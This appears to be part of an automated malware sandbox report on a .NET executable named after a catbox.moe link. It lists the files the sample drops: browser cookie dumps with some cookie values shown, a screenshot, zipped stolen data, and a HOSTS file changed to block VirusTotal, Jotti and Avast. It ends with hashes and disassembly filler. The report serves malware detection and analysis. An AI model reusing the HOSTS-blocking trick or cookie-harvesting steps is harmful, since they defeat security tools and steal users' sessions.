                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):64
                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                      Malicious:false
                                                                                                                      Preview:@...e...........................................................
                                                                                                                      Process:C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):51200
                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.8467337400211222
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
                                                                                                                      MD5:7A03CC0EAD0AEFF210C3E60823AAA5EC
                                                                                                                      SHA1:8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
                                                                                                                      SHA-256:D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
                                                                                                                      SHA-512:8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):688537
                                                                                                                      Entropy (8bit):7.997422768964064
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:12288:frlMkn+92Of4ai/iCJhJxCKQy8a0BIu9jz/GiZYR0/s:5n+1f5iqC9xCZL9HGF
                                                                                                                      MD5:4A2E4B1ECEE6461806C3D3C04700D68D
                                                                                                                      SHA1:57CBF5AE6F10DF1119AB4459F6D78A6CB316660C
                                                                                                                      SHA-256:A4AB6B9C3243AF1A7D9E4B30F7B676A2B7BB58AF5BA9B66C65100501AAEED240
                                                                                                                      SHA-512:6E05FE13B06BE969B4425D4DB62CD34841832A71AB45F746137D0BA5A84BB30EF257E6C8113DA0972DBF8AADA69ECA207DC6A66708935BCA2B3D72A47FCA5FA5
                                                                                                                      Malicious:false
                                                                                                                      Preview:PK.........b.Y?..>....!...#...Browsers/Cookies/Chrome Cookies.txt}.Ar.0...u..(......J.*RA..I..A..D....t...e....g.&k...+..R.2....8.1.e>s.D0..`.3.....'`6w....l (.z...7..+..+....:a.gk.....y....(t..e.I....../.*.Ex.+....,.M.../P>>.t3.........3..b..=.DI.]u..|Y....s.P.z...6.].....:..$.m.?PK.........b.Y................Display/Display.pngt.y<....}...T.JI..K.RId....%YGTH%.:cP!..JF!.[D.....Y..}.c..g..........?.u.\..\..<...<.+..P.......'.PZ&...x......1...h@.&..@Q.....'.[..P.....P.g(KO.8....jq.|...s.......,.O......,,|..+V...=e...."..*..2.9..~E.;.B..-...u..1...B/.\TQ.K.>"R$34..vJav.DG;.K-......cW..Zn4...k.o...9.z.H...7..#.W}..i..o)-.}.2....r/.l/.:..]y.n.x;....om..D...42.V..#lD...I].u.s....x.nMY.w...f.....uM.j..q...O#..?aXd..t...6.........9z."W.0.a...w.k-.Po....*r{.Y'eE.Cr.WE.47..UW.U./.(.9....8..im..e......bO..g-.S...S....Y...-v..gVBn..Y..(......T....B............9vy.eZ.@......CL%...R....w._.|.-.D......{...(.I..r..uw.S\Ky4..V|...._"...7..S..6...,
                                                                                                                      Process:C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):289
                                                                                                                      Entropy (8bit):5.792892974633299
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:Pk3rsSQSvxbyv3r4zP9JcrDSLukrTSSIGDRmEksDVD:c7fvvI74TAHSLLXAGDR+U
                                                                                                                      MD5:C47EEE503933D7B3AB514A4EBB579448
                                                                                                                      SHA1:5A950E03C2C47977657E72B3C483488E1F8F4181
                                                                                                                      SHA-256:3E4300F6591F31C3F612127C2384CF60BCAE35FF3060A7562DD8F2AD168C4154
                                                                                                                      SHA-512:C3C7C521DDB4DACCF616002C1168264B46FB19C5A55B972CF45CDB3CC7E20E0CF86015371646FFA232426EFB23437367201017A580DE456A87EFBB4751D9121D
                                                                                                                      Malicious:false
                                                                                                                      Preview:.google.com.TRUE./.FALSE.13343562100717560.1P_JAR.2023-10-05-09...google.com.TRUE./.FALSE.13356781299717612.NID.511=k9tT3q7Yfh1nx_FSl06F5UE_vdaFQreiGKe1aDN83MeveD7PL1RZXva4s-nFc9waQi9LtKavuTIba8MUkoGu58E8E81gwB_TWJ4Ng-LfCvzhem7rNrhZQ2aGvJZ9g2TYhqx2W2O4E7uHQzPk3vuLvMLxFXZsqE6NdAViQDECGpo..
                                                                                                                      Process:C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):705667
                                                                                                                      Entropy (8bit):7.927532641526932
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:Gh1JrcIEHjrPYIshYHYYhHVgP8epua6aAwwgVFUo4K+wlAuPuvhu9FGKHelPJ:SJrczHjrYNEheJCDwwsFtT+wBuvALe
                                                                                                                      MD5:94FEAB0875810DB6D1727698487C5569
                                                                                                                      SHA1:7D7E5A0B034A27F461B763728CF7DE0EFFFF015F
                                                                                                                      SHA-256:576AD0CF98BA8E97BC3BB9F62E71409BB34EB93BE812FC7C2ABDB365274E3535
                                                                                                                      SHA-512:9791EA6E4395D0851F80350A1781E942989C2A42B91297E9F27A7358AF2881DFF502BC6C114D545AEC7E3208AB507838FF8DD31432C0338DFD89558DEDED1AA7
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....mU.......TWWwu.......<_Uu..t..]...U$.3G...J..&.p..JP@..*..$#9'.9d%."...j~.7...._c.+.O..y..3.x.;.k.Cy...1g.s....><.4wZjE...:..tO]3t>..a......t>.~.p.O{Q|.2Q.M.5...=..ON.=....d.+6.h.q.~|vt>..Y1...G.\;|.Gk...'Fb.$..@.'.}.0q......P&>T....m.csM..Fb..3...G[&fI.}.....p.....).w=<....w>4k:.x.e...U.o.p..c.....DZ?...3`..[&..o|..wFt._.....x.....L.L..{5......7..Y.=.{-.o..C.}.v..2......73............+S.h.X9...w.}...'...n....L...i...]qk.9.j.o....m.....8.....r.....`a.......U...7U..~.O...L....j........k.....xb....n.......jr..3..t.>.p..sl.7V..I9{..A........W...:.]......-.4.......jI.Y...R..".R....y..d...5...D..m.qX..u......'wMs.\...|u.[..M..=....vK.wM..tu....N..g..2.;_Yuw.N.cX.{.Vj;;^....vMf...._KK.....J....W.Vc.....!..w2....vL...|B.....Ln.E........Wf.<b..}.M...jb..s....~..[]....}X.].....XK.x..f.4.MZ.Z..l.....*]7..)O.g..[.}..S...w6...nqi..l~I.)W..Z..z.
                                                                                                                      Process:C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2285
                                                                                                                      Entropy (8bit):4.576057831611122
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:vDZhyoZWM9rU5fFc7w09PI8A+VyUq8UwWsnNhUm:vDZEurK9z8TwU0wWsn/
                                                                                                                      MD5:A58B2342D8EAA7EA695FD216006E3DDD
                                                                                                                      SHA1:A286457D10D2A50E7B2699BDF55D85081FADD23C
                                                                                                                      SHA-256:C3AF2F576A3758B1BCDBD491B6021FBF52F6AFF4C0D03F4914D9C3F51A6A6361
                                                                                                                      SHA-512:B1938B288BECE554759F4FA8341513828487960991AE6C4A8C4D3958A5669357A6C2F1ED140FF87E740DC4C6AFEB9F16967AE7F4000F41341B802D22D8CE8FC3
                                                                                                                      Malicious:true
                                                                                                                      Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 virusscan.jotti.org..0.0.0.0 www.virusscan.jotti.org..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com
                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Entropy (8bit):5.995125051419421
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                      File name:https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      File size:190'464 bytes
                                                                                                                      MD5:e09f55d421cb45340a8c97c217ba56cf
                                                                                                                      SHA1:2280afe7bb2d07c315e2599c21f069dd1b7ce3b8
                                                                                                                      SHA256:1e8d2f6fa4b8d1ec630758422c493de85d367f2eb7c76b452b9843ed2b2a7bff
                                                                                                                      SHA512:0d690f46d18855009af0b15a8e352dbe178de4d0f055fab00cc18837ad30aee3ffffef5263bb6598ff0e6ba7dbb55029ce976101be853cb03b01b9b440418c8b
                                                                                                                      SSDEEP:3072:L+AIo6iee4xc7I+g4A9PtLmMf8noNM3MWQ/s17LVHEEPX9p8lt1WkXBkrY1SZbBc:LGo6iee4xUZA9Pt6Mf8noNM3MWQ/s17P
                                                                                                                      TLSH:4014294853BC8F23F7AF4FFC866191D6CB72B107E84AF74E1C8890E825667816445BA7
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............^.... ........@.. .......................@............`................................
                                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                                      Entrypoint:0x42fd5e
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0xF5959D04 [Sun Jul 25 18:23:00 2100 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                      Instruction
                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
